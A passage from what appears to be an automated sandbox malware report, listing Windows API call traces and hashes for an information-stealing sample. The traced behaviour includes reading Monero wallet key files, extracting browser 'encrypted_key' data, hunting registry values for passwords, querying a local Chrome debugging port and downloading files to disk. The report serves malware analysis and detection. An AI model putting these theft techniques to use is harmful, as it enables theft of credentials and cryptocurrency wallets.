                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: 089755b69ef6b9cb226001ece7b81f0eca9b1a28f69eaa951850d5a1aa4aeb78
                                        • Instruction ID: 366809d173f6a7be4d063ba9dbe94fe7e1e589301062e9e17179a33b0b13e23d
                                        • Opcode Fuzzy Hash: 089755b69ef6b9cb226001ece7b81f0eca9b1a28f69eaa951850d5a1aa4aeb78
                                        • Instruction Fuzzy Hash: BBC16FB5900119EBCB14EF60DC99FEE7379AB64304F00459DE50AA7242EB78EA85CF91
                                        APIs
                                          • Part of subcall function 007C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007C8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C453C
                                        • lstrcat.KERNEL32(?,0165EC70), ref: 007C455B
                                        • lstrcat.KERNEL32(?,?), ref: 007C456F
                                        • lstrcat.KERNEL32(?,0165D128), ref: 007C4583
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007C8F20: GetFileAttributesA.KERNEL32(00000000,?,007B1B94,?,?,007D577C,?,?,007D0E22), ref: 007C8F2F
                                          • Part of subcall function 007BA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 007BA489
                                          • Part of subcall function 007BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007BA13C
                                          • Part of subcall function 007BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007BA161
                                          • Part of subcall function 007BA110: LocalAlloc.KERNEL32(00000040,?), ref: 007BA181
                                          • Part of subcall function 007BA110: ReadFile.KERNEL32(000000FF,?,00000000,007B148F,00000000), ref: 007BA1AA
                                          • Part of subcall function 007BA110: LocalFree.KERNEL32(007B148F), ref: 007BA1E0
                                          • Part of subcall function 007BA110: CloseHandle.KERNEL32(000000FF), ref: 007BA1EA
                                          • Part of subcall function 007C9550: GlobalAlloc.KERNEL32(00000000,007C462D,007C462D), ref: 007C9563
                                        • StrStrA.SHLWAPI(?,0165ED90), ref: 007C4643
                                        • GlobalFree.KERNEL32(?), ref: 007C4762
                                          • Part of subcall function 007BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA23F
                                          • Part of subcall function 007BA210: LocalAlloc.KERNEL32(00000040,?,?,?,007B4F3E,00000000,?), ref: 007BA251
                                          • Part of subcall function 007BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA27A
                                          • Part of subcall function 007BA210: LocalFree.KERNEL32(?,?,?,?,007B4F3E,00000000,?), ref: 007BA28F
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C46F3
                                        • StrCmpCA.SHLWAPI(?,007D08D2), ref: 007C4710
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 007C4722
                                        • lstrcat.KERNEL32(00000000,?), ref: 007C4735
                                        • lstrcat.KERNEL32(00000000,007D0FA0), ref: 007C4744
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: ac4b86aa5e27ca63bd74f4c3d293c794ab09689de8a7701cebe070f1f4ab032d
                                        • Instruction ID: 71a167ca778c8203eeae7ea71964ab88e733eba6c1162c24cc4e03ae245786c6
                                        • Opcode Fuzzy Hash: ac4b86aa5e27ca63bd74f4c3d293c794ab09689de8a7701cebe070f1f4ab032d
                                        • Instruction Fuzzy Hash: A17134B6900208BBDB14EBE4DD9AFDE7779AB88300F00859CF60597181EB39DB55CB61
                                        APIs
                                          • Part of subcall function 007B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007B12B4
                                          • Part of subcall function 007B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 007B12BB
                                          • Part of subcall function 007B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007B12D7
                                          • Part of subcall function 007B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007B12F5
                                          • Part of subcall function 007B12A0: RegCloseKey.ADVAPI32(?), ref: 007B12FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 007B134F
                                        • lstrlen.KERNEL32(?), ref: 007B135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 007B1377
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007C8CF0: GetSystemTime.KERNEL32(007D0E1B,0165E2E8,007D05B6,?,?,007B13F9,?,0000001A,007D0E1B,00000000,?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007C8D16
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 007B1465
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007BA13C
                                          • Part of subcall function 007BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007BA161
                                          • Part of subcall function 007BA110: LocalAlloc.KERNEL32(00000040,?), ref: 007BA181
                                          • Part of subcall function 007BA110: ReadFile.KERNEL32(000000FF,?,00000000,007B148F,00000000), ref: 007BA1AA
                                          • Part of subcall function 007BA110: LocalFree.KERNEL32(007B148F), ref: 007BA1E0
                                          • Part of subcall function 007BA110: CloseHandle.KERNEL32(000000FF), ref: 007BA1EA
                                        • DeleteFileA.KERNEL32(00000000), ref: 007B14EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: 41cde09d559d3cb82e8675674b4fcc5562141fd89ebbe5bebf910c3b03247dd6
                                        • Instruction ID: 549b2775574d1c0e73e2104a25458cec9ea8a41fb700dae62b25653ac5020edd
                                        • Opcode Fuzzy Hash: 41cde09d559d3cb82e8675674b4fcc5562141fd89ebbe5bebf910c3b03247dd6
                                        • Instruction Fuzzy Hash: E15141B195011CABCB14FB60DDAAFED733D9B54305F4045DCB60A62092EE346B89CBA6
                                        APIs
                                        • InternetOpenA.WININET(007D0AF6,00000001,00000000,00000000,00000000), ref: 007B9A6A
                                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007B9AAB
                                        • InternetCloseHandle.WININET(00000000), ref: 007B9AC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Open$CloseHandle
                                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                        • API String ID: 3289985339-2144369209
                                        • Opcode ID: 31dd9466e21d116eec96e0924d61d9d63f7f55c8b067817e10de89753be54031
                                        • Instruction ID: d6dc6442e220bbb1c4aa2c06decace1db363216277187ca7bb9766f0a12a8fe6
                                        • Opcode Fuzzy Hash: 31dd9466e21d116eec96e0924d61d9d63f7f55c8b067817e10de89753be54031
                                        • Instruction Fuzzy Hash: E2412D75A10258EFCB14EF94CC99FDD7778BB48740F104199F615A6190DBB8AE80CBA0
                                        APIs
                                          • Part of subcall function 007B7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007B739A
                                          • Part of subcall function 007B7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007B7411
                                          • Part of subcall function 007B7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 007B746D
                                          • Part of subcall function 007B7330: GetProcessHeap.KERNEL32(00000000,?), ref: 007B74B2
                                          • Part of subcall function 007B7330: HeapFree.KERNEL32(00000000), ref: 007B74B9
                                        • lstrcat.KERNEL32(00000000,007D192C), ref: 007B7666
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 007B76A8
                                        • lstrcat.KERNEL32(00000000, : ), ref: 007B76BA
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 007B76EF
                                        • lstrcat.KERNEL32(00000000,007D1934), ref: 007B7700
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 007B7733
                                        • lstrcat.KERNEL32(00000000,007D1938), ref: 007B774D
                                        • task.LIBCPMTD ref: 007B775B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID: :
                                        • API String ID: 2677904052-3653984579
                                        • Opcode ID: b431c9a4fcdb27a0ef6cfaca895fbb4ce75a4ae75689dce41d2ba2d46764ae06
                                        • Instruction ID: 6b4fb87e21f58d21f36b628bd30aad6ffd9ef4c930b68fed177bef9b2e573af7
                                        • Opcode Fuzzy Hash: b431c9a4fcdb27a0ef6cfaca895fbb4ce75a4ae75689dce41d2ba2d46764ae06
                                        • Instruction Fuzzy Hash: 2C3152B1904208EBDB08EBE4DDA9EFF777DEB44301B604118F112672A1EE38E946DB51
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0165E850,00000000,?,007D0E14,00000000,?,00000000), ref: 007C82C0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C82C7
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 007C82E8
                                        • __aulldiv.LIBCMT ref: 007C8302
                                        • __aulldiv.LIBCMT ref: 007C8310
                                        • wsprintfA.USER32 ref: 007C833C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: 6db439d093cab192ee7003e96f41e4887b6df93ed5726426990412d155ea9500
                                        • Instruction ID: 8eee4ba22bbf9156e6e8efef686ff3c9bfc70e974deae25f6e737a8b3573726a
                                        • Opcode Fuzzy Hash: 6db439d093cab192ee7003e96f41e4887b6df93ed5726426990412d155ea9500
                                        • Instruction Fuzzy Hash: 3C212CB1E44209ABDB10DFD4CC49FAEB7B8FB44B10F20451DF615BB280D77899018BA5
                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007B4889
                                          • Part of subcall function 007B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007B4899
                                        • InternetOpenA.WININET(007D0DFB,00000001,00000000,00000000,00000000), ref: 007B615F
                                        • StrCmpCA.SHLWAPI(?,0165F1C0), ref: 007B6197
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 007B61DF
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007B6203
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 007B622C
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 007B625A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 007B6299
                                        • InternetCloseHandle.WININET(?), ref: 007B62A3
                                        • InternetCloseHandle.WININET(00000000), ref: 007B62B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 889a9f8ae6da65355fed2aac4e16db35b21e0af4fff352166b543e8e70b77c1e
                                        • Instruction ID: 3d8edcf042204a4703e6fe18cd7504b657f62e2188476b24670c4580552000d5
                                        • Opcode Fuzzy Hash: 889a9f8ae6da65355fed2aac4e16db35b21e0af4fff352166b543e8e70b77c1e
                                        • Instruction Fuzzy Hash: 61512CB1A00218ABEF20DF90DC49FEE7779BB44705F108198E705A7191DB78AA89CF95
                                        APIs
                                        • type_info::operator==.LIBVCRUNTIME ref: 0083024D
                                        • ___TypeMatch.LIBVCRUNTIME ref: 0083035B
                                        • CatchIt.LIBVCRUNTIME ref: 008303AC
                                        • CallUnexpected.LIBVCRUNTIME ref: 008304C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 2356445960-393685449
                                        • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction ID: 09a76703d19c6450a7ee11d7e1fd57485bb25445c33241167a31bea69c25f20a
                                        • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction Fuzzy Hash: 97B16731801219EFCF15DFA8D8A19AEBBB5FF84314F10816AE911AB212D770DA51CFD6
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007B739A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007B7411
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 007B746D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 007B74B2
                                        • HeapFree.KERNEL32(00000000), ref: 007B74B9
                                        • task.LIBCPMTD ref: 007B75B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
